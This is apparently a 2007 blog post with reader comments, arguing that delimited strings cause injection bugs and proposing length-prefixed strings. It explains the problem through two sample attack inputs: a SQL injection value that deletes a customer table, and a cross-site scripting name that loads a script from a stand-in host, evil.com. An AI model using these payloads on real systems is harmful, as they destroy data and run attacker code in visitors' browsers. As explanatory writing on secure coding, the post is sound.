Delimited data has been one of the most persistent problems in software development as long as I can remember, and yet nobody seems to have identified the larger issue here.
This is a common practice that persists right up through the year 2007. Text strings of unknown length are delimited with special characters, quotes, apostrophes, commas, nulls or even XML tags.
In the most simple example, you put quotes around a string, like "hello", and computers identify the string by looking for the beginning and ending quotes. This is second-nature to any literate human, and it seems like such a simple and trivial thing to do, but these types of text delimiters are one of the largest sources of faults and vulnerabilities in computer software today.
At the heart of the problem is the practice of mixing code and data in an unmanaged way.
The classic example that all developers deal with is text strings used in SQL statements. In SQL, text strings are delimited with single quotes. An example query that executes a customer search based on a customer's last name would look like this:
SELECT * from CUSTOMERS where lastName = 'Smith';
And that works great. Then a month later your program blows up because someone had a last name with a single quote in the name, like O'Reilly:
SELECT * from CUSTOMERS where lastName = 'O'Reilly';
And the computer ralphs because a) This SQL statement has invalid syntax and b) There is no customer with a last name of O anyway.
So, the best case scenario is that your software crashes on every apostrophe. A worse case scenario is that a hacker uses this vulnerability to destroy your database by embedding additional commands into the string.
Example: ask for a customer with a last name of "XYZ'; DELETE * from CUSTOMERS;"
This causes your SELECT statement to become:
SELECT * FROM CUSTOMERS where lastName = 'XYZ'; DELETE * from CUSTOMERS;'
See, you've tricked SQL into executing a DELETE statement by sending the proper character sequence (apostrophe semicolon) that ends the previous statement and starts a new one. This is called "SQL Injection". It takes virtually zero skills to do something like this, and the damage caused is catastrophic. This is one of the most common types of malicious hacks done on internet sites today. There are ways to get around SQL Injection by using parameterized SQL statements, but there are too many developers who don't know this or forget to do this.
Using XML tags to delimit data seems more secure...right? Well, it's definitely more complicated, but it is no more secure. Even more popular than SQL Injection is a hacking technique called "Cross-Site Scripting". It works just like SQL Injection in that you provide a data string that contains code for executing a malicious program - only this time you are hacking HTML instead of SQL.
HTML code for displaying a name might look like this:
<label>John Doe</label>
A malicious hacker takes advantage of this by saving their name as:
John <script src="evil.com/evil.js"></script>Doe
And thus the HTML generated is:
<name>John <script src="evil.com/evil.js"></script>Doe</name>
Since the browser can't reliably tell the difference between code and data, it will execute the embedded JavaScript program. This JavaScript program can do all manner of bad things to you if you are unfortunate enough to see a page containing this user's name.
Software development today is practically brimming over with all manner of specs and schemes that involve delimiting text data with special characters or other sequences of text data. This leads to more cases of mayhem and vulnerability than I could ever recount here.
The very editor I'm typing in right now (here on blogger.com) is giving me fits and problems because of the sample HTML code I wrote above while using this HTML editor. It can't figure out whether to interpret my example HTML as just text or real HTML commands. I can't blame blogger.com too much for this, because using HTML to edit HTML is a total blurring of code and data, and it's incredibly difficult to do intelligently. Again this is an example of the problem I'm talking about: blending code with data.
Maybe you think C programmers were so clever by choosing to terminate strings with NULL characters? Well that has lead to one of the biggest sources of security vulnerabilities ever: Buffer Overruns!
A browser routine or OS routine that accepts a null-terminated string will patiently keep reading string data until it finds that NULL character. If you are a hacker, you just make sure you never send that NULL character. You keep sending data until you overflow whatever buffer is being used. Now you have access to write anything you want directly to the computer's memory - including malicious code to execute. Just like the browser, the operating system will have a very difficult time telling the difference between code and data.
I've listed several major examples where delimited strings are, at best, a major problem. I could also tell frightful tales of thing gone wrong with comma separated values, tab separated values, URL encoding, URL re-writing, URL spoofing, forced directory navigation (dot-dot), tag-based page development, hidden macro commands, function-key activation, etc.
But I think my point is clear: Delimited strings are dangerous, and they are a major problem. Code and data should never be mixed without iron-clad boundary definitions.
My solution: Defined-length strings!
A defined length string enforces a clear boundary between code and data by defining the length of a string outside of the string itself.
There are many ways of doing this. Here is one way:
Instead of "This is my text" use [15]This is my text
The [15] is code that tells a computer that the following string is 15 characters long. The computer will read data for 15 characters, no less, no more, and be immune to the data itself containing any special characters. The 16th character is guaranteed to be the beginning of new code, because the determination of the length of the data is entirely outside of a user's control. (Think about it.)
SQL statements could be written as follows:
SELECT * from USERS where last_name = [8]O'Reilly;
HTML fields could be written as follows:
<label length="8">John Doe</label> or <label>[8]John Doe</label>
Now the browser knows that those 8 characters are to be treated as data, not code, no matter what.
Similar to the way Java automagically adds a NULL character at the end of a String, maybe compilers could be designed to add the length to the beginning of a String. It could reserve the first 4 bytes of a string for a 32-bit unsigned integer containing the length of the string. The language could make this implementation fairly transparent to the developer, and even allow for Unicode strings.
The point is that you force your code to strongly define all of its boundaries. Once you do that, then the data can safely fall into place without all the hassles and errors and risks we face today. The data can never "steal control" because the code never relinquishes control to begin with.
Oh, and by the way, this is not an attack on functional programming. I know functional programming prides itself on being able to blur the distinction between code and data. As long as this is done in some kind of controlled manner that does not allow for unintended code injection, that's fine.
Perhaps yet another alternative to handling this problem is to build string encoding right into the language itself, so that every character of every string is always encoded no matter what. This is similar to brute-force URL encoding where every character is changed to it's %xx equivalent, whether it needs to be or not. This seems like it would be a waste of space and processing time compared to defined-length strings, but at least it is one other way of addressing the problem.
I just want this problem to be addressed, because Software Engineering is difficult enough without having to always keep track of code-injection, character escaping, buffer overflowing, and all manner of other data vulnerabilities.
Subscribe to:
Post Comments (Atom)
3 comments:
Ah, pascal-style strings are poised for a comeback!
I have no idea what programming language you are using, but I know I've never had this trouble as I use classes that automatically escape all that garbage. As for your 'sql hack' sequence (';delete...) .. garbage. The sql library I use ignores any semicolons. What kind of garbage language, libaries, etc do you use to run into problems like this??
Libraries are not the solution. This is something that needs to be built into the language.
You claim you have libraries and classes that "fix" these problems, and that's great.
But this only works if you have 3rd party libraries for every possible situation, and the developer knows to use them.
Amatuer developers get burned because they DON'T KNOW to use a special library to make their SQL statements safe. Even veteran developers get burned when they forget to take these precautions.
This is something that should be taken care of by the language and not by custom classes and libraries.
What if someone invents a new Query Language called "TQL"? How do you make TQL statements safe? Write yet another custom filter class? YUK!
Post a Comment